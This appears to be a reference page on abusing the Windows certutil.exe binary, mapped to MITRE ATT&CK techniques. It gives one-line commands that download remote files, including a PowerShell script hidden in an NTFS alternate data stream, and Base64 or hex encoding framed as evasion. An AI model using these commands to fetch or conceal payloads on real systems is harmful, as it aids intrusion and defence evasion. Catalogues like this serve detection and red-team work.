.. /Certutil.exe
Star

Windows binary used for handling certificates


Paths:

Resources:
Acknowledgements:

Detection:

Download

Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Usecase: Download file from Internet
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105



Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Usecase: Download file from Internet
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105



Alternate data streams

Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Encode

Command to encode a file using Base64
certutil -encode inputFileName encodedOutputFileName
Usecase: Encode files to evade defensive measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1027



Decode

Command to decode a Base64 encoded file.
certutil -decode encodedInputFileName decodedOutputFileName
Usecase: Decode files to evade defensive measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1140



Command to decode a hexadecimal-encoded file decodedOutputFileName
certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Usecase: Decode files to evade defensive measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1140